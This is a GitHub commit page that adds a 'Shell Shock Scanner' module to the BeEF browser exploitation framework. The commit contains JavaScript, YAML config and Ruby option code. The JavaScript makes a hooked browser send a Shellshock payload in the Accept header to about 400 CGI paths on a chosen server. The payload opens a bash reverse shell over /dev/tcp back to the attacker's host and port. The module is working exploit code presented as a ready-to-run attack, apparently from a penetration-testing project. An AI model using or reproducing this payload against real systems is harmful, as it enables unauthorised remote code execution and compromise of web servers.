Permalink
Browse files

Add Shell Shock Scanner module

  • Loading branch information...
1 parent fb57121 commit cc0993a2eb54ae865f5f41c2381cb981fedacff1 @bcoles bcoles committed Oct 30, 2014
@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var rproto = '<%= @rproto %>';
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var lhost = '<%= @lhost %>';
+ var lport = '<%= @lport %>';
+ var target = rproto + '://' + rhost + ':' + rport;
+ var method = '<%= @method %>';
+ var wait = '<%= @wait %>';
+ var timeout = '<%= @timeout %>';
+
+ get_cgi = function(uri) {
+ try {
+ var payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1 &";
+ var xhr = new XMLHttpRequest();
+ xhr.open(method, target+uri, true);
+ xhr.onload = function () {
+ };
+ xhr.onreadystatechange = function () {
+ if (xhr.readyState == 4 && xhr.status == 200) {
+ beef.debug("[command #<%= @command_id %>] Response: " + xhr.response);
+ }
+ }
+ xhr.setRequestHeader("Accept", payload);
+ xhr.send(null);
+ } catch (e){
+ beef.debug("[command #<%= @command_id %>] Something went wrong: " + e.message);
+ }
+ }
+
+ var scripts = new Array(
+<%=
+ scripts = []
+ File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
+ file_handle.each_line do |line|
+ uri = line.chomp!
+ next if uri =~ /^#/
+ next if uri.nil?
+ scripts << "'#{uri}'"
+ end
+ end
+ scripts.shuffle.join(",\n")
+%>
+);
+
+ // add scripts to queue
+ var requests = [];
+ for (var i=0; i<scripts.length; i++) requests.push(scripts[i]);
+
+ // process queue
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan");
+ var handle = setInterval(function() {
+ if (requests.length > 0) {
+ get_cgi(requests.pop());
+ } else cleanup();
+ }, wait*1000);
+
+ // clean up
+ cleanup = function() {
+ if (handle) {
+ beef.debug("Killing timer [ID: " + handle + "]");
+ clearInterval(handle);
+ handle = 0;
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
+ }
+ }
+ setTimeout("cleanup();", timeout*1000);
+
+});
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ shell_shock_scanner:
+ enable: true
+ category: "Exploits"
+ name: "Shell Shock Scanner (Reverse Shell)"
+ description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.<br/>The list of CGI scripts was taken from <a href='https://github.com/nccgroup/shocker'>Shocker</a>."
+ authors: ["Stephane Chazelas", "mz", "bmantra", "bcoles"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,42 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Shell_shock_scanner < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'method', 'ui_label' => 'HTTP Method', 'value' => 'GET' },
+ { 'name' => 'rproto',
+ 'type' => 'combobox',
+ 'ui_label' => 'Target Protocol',
+ 'store_type' => 'arraystore',
+ 'store_fields' => ['rproto'],
+ 'store_data' => [
+ ['http'],
+ ['https']
+ ],
+ 'emptyText' => 'Select a protocol (HTTP/HTTPS)',
+ 'valueField' => 'rproto',
+ 'displayField' => 'rproto',
+ 'mode' => 'local',
+ 'autoWidth' => true
+ },
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
+ { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
+ { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
Oops, something went wrong.

0 comments on commit cc0993a

Please sign in to comment.